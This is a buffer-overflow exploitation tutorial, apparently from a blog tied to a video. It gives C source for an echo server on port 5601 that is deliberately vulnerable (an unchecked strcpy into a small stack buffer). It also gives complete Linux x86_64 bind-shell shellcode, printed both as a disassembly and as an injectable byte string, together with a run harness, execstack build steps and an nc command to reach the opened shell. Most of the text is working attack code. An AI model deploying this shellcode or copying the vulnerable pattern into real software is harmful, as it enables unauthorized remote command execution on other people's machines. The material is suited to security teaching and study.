Buffer Overflow is the vulnerability which make your system high risk. It allows unlimited access to the attacker, and allows inject shellcodes. That is the attacker can execute any malicious codes on target machine. This video tutorial shows how the hackers exploits remote services running in remote systems and how to get access to it. Here I'm using custom socket program, which is a vulnerable to Stack Buffer Overflow. The program is ECHO server, which listens port 5601.
Vulnerable Code
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
/*
http://www.terminalcoders.blogspot.com
BOF Tutorial
Video: https://youtu.be/uPfBkU0LqBA
*/
void copy(char str[8000]){ //Vulnerable function
char cpy[84];
strcpy(cpy, str); //Vulnerable section
}
void start_server(){
char str[8000], cpy[64];
int sfd, cfd;
struct sockaddr_in sock;
sfd = socket(AF_INET, SOCK_STREAM, 0);
bzero(&sock, sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_addr.s_addr = htons(INADDR_ANY);
sock.sin_port = htons(5601); //Binding port
bind(sfd, (struct sockaddr *) &sock, sizeof(sock));
listen(sfd, 10);
cfd = accept(sfd, (struct sockaddr*) NULL, NULL);
while(1){
read(cfd,str,8000);
copy(str);
puts(str);
write(cfd, str, strlen(str)+1);
}
}
int main(int argc, char **argv){
start_server();
}
ShellCode
/*
---------------------------------------------------------------------------------------------------
Linux/x86_64 - Bind 5600 TCP Port - shellcode - 87 bytes
Ajith Kp [ http://fb.com/ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
---------------------------------------------------------------------------------------------------
Disassembly of section .text:
0000000000400080 <.text>:
400080: 48 31 c0 xor %rax,%rax
400083: 48 31 d2 xor %rdx,%rdx
400086: 48 31 f6 xor %rsi,%rsi
400089: ff c6 inc %esi
40008b: 6a 29 pushq $0x29
40008d: 58 pop %rax
40008e: 6a 02 pushq $0x2
400090: 5f pop %rdi
400091: 0f 05 syscall
400093: 48 97 xchg %rax,%rdi
400095: 6a 02 pushq $0x2
400097: 66 c7 44 24 02 15 e0 movw $0xe015,0x2(%rsp)
40009e: 54 push %rsp
40009f: 5e pop %rsi
4000a0: 52 push %rdx
4000a1: 6a 31 pushq $0x31
4000a3: 58 pop %rax
4000a4: 6a 10 pushq $0x10
4000a6: 5a pop %rdx
4000a7: 0f 05 syscall
4000a9: 5e pop %rsi
4000aa: 6a 32 pushq $0x32
4000ac: 58 pop %rax
4000ad: 0f 05 syscall
4000af: 6a 2b pushq $0x2b
4000b1: 58 pop %rax
4000b2: 0f 05 syscall
4000b4: 48 97 xchg %rax,%rdi
4000b6: 6a 03 pushq $0x3
4000b8: 5e pop %rsi
4000b9: ff ce dec %esi
4000bb: b0 21 mov $0x21,%al
4000bd: 0f 05 syscall
4000bf: 75 f8 jne 0x4000b9
4000c1: f7 e6 mul %esi
4000c3: 52 push %rdx
4000c4: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
4000cb: 2f 73 68
4000ce: 53 push %rbx
4000cf: 48 8d 3c 24 lea (%rsp),%rdi
4000d3: b0 3b mov $0x3b,%al
4000d5: 0f 05 syscall
---------------------------------------------------------------------------------------------------
How To Run
$ gcc -o bind_shell bind_shell.c
$ execstack -s bind_shell
$ ./bind_shell
How to Connect
$ nc <HOST IP ADDRESS> 5600
Eg:
$ nc 127.0.0.1 5600
---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";
void main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) sh;
(int)(*func)();
}
